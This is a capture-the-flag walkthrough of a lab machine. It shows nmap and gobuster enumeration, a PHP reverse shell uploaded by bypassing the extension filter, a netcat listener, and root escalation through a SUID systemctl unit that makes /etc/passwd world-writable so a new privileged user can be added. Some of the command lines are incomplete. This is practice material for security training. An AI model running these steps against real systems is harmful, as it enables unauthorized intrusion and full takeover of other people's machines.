Let’s Start with Basic Nmap scan.
nmap -A -T4 -p- -sC <ip> -oN scan.nmap
Let’s begin with enumerating SMB shares.
so look’s like we are denied access!, never mind we still got other ports to enumerate.
lets move towards web server, its running in port 3333
lets see if there is an hidden directories. You can choose any tool of your choice, as of now we use gobuster.
gobuster dir -u http://ip:3333/ -w /wordlists
- u switch to specify the URL.
- -w for wordlist. //provide the path.
/Internal looks interesting .let’s check,
Since now we know that we can upload a file. Let's upload a reverse shell and try to connect back.
Oops!! looks like its blocking the php files.
Let’s try to bypass the client-side filter by altering the extension. for example you can try using .php5, .php4, phtml also double extension like .php.txt, .php.jpg etc.
you can use netcat to set up a listener.
nc -nvlp <port>
Access the file from the browser you must get a reverse shell.
you can use the following commands to stabilize the shell.
python -c ‘import pty;pty.spawn(“/bin/bash”)’
for further more stable shell execute the following commands.
export TERM=xterm //gives us access to term commands as clear
stty raw -echo; fg//turns of echo on our terminal which gives us access to auto complete, tab, arrow keys and Ctrl+C.
You can get the user flag but our intension is to root the box, so are you ready for some cool stuffs!! lets Privesc.
So the instructions says there is a file with SUID bit that will allow us to escalate privilege.
SUID bit is permission set by root which allows user to run the program but it will be executing it as root.
we can make use of find command to search for the file.
find / -perm -u=s -type f 2>/dev/null
not every file with suid permission can be used to escalate privileges.
looks like systemctl binary can be used. but how i know ..there are some default lists you can check.
how we are going to do this?
systemctl runs the unit files so if we manage to create one of our own and and execute it. Lets do this..
you can refer GTFObins .
chmo=$(mktemp).service //creating our environmental variable.
ExecStart=/bin/bash -c “chmod 777 /etc/passwd” //executing a command to change permission of passwd file.
WantedBy=multi-user.target’ > $chmo
./systemctl link $chmo //linking it to $chmo
./systemctl enable — now $chmo
Now the permission for /etc/passwd should be changed.
you can use following command to create a hash.
Openssl passwd -salt 123
here we are using 123 as salt.
upon entering that you’ll be asked for passwd, type the password it’ll generate the hash.
Now you can write the new user entry on /etc/passwd as,
new//the name of the user
hash //passwd hash